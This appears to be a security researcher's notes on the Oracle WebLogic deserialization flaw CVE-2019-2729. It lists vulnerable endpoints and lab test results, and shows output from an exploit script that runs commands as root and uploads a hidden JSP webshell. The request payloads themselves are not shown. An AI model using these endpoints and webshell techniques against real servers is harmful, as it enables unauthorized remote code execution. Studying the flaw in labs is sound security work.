WebLogic - CVE-2019-2729

Oracle WebLogic server is affected by a remote code execution vulnerability in wls-wsat.war and wls9_async_response.war packages due to unsafe deserialization of Java objects. A remote unauthenticated attacker can exploit the issue by sending a custom Java serialized object via HTTP request to execute arbitrary Java code in the context of the web server.

Exploiting wls-wsat.war will return command output, while wls9_async_response.war is blind.

Affected versions: 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0

Vulnerable endpoints

## wls-wsat.war (cmd response)
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

## wls9_async_response.war (blind)
/_async/AsyncResponseService

Test data

Version	Image	Result	Reason
10.3.6.0	VulnHub 10.3.6.0-2017	Vulnerable	wls-wsat deserialization
12.2.1.3	VulnHub 12.2.1.3-2018	Not vulnerable	Endpoints missing
12.2.1.3	VulnHub 12.2.1.3	Not vulnerable	Endpoints missing
12.2.1.3	weblogic:12.2.1.3	Inconclusive	"Old format work area header is disabled."

Request 01, RCE on version 10.3.6.0:

Request 02, designed for version 10.2.7.1, RCE on 10.3.6.0:

Request 03, designed for version 10.3.6.0, RCE on 10.3.6.0:

Request 04, designed for version 10.3.6.2, RCE on 10.3.6.0:

Request 05, designed for version 12.2.1.3, error "Old format work area header is disabled." on version 12.2.1.3. Not sure if this is an error caused by my container, need more test data.

Scripts

weblogic_get_webshell.py - runs three payloads on target at once, by rootedshell.

» python3 weblogic_get_webshell.py http://127.0.0.1:7003
--- payload2.txt (weblogic 10.3.6) ---
http://127.0.0.1:7003/wls-wsat/CoordinatorPortType
whoami : 
root
--- payload.txt, uploading webshell '.s8Jn4WlqX2c592.jsp' ---
http://127.0.0.1:7003/_async/.s8Jn4gWlqX2c592.jsp?cmd=whoami
Cookie:JSESSIONID=DxZLnCLX1y5BPn1Yw9GrpYVFR0NQQhyrk1qFXsQ1Pz2qQbW1lyKR!903277329; path=/; HttpOnly
whoami:
root

As there are few public exploits using the /_async/ endpoint, I've modified rootedshells script to only upload a webshell and allow direct command execution. The script can be found here.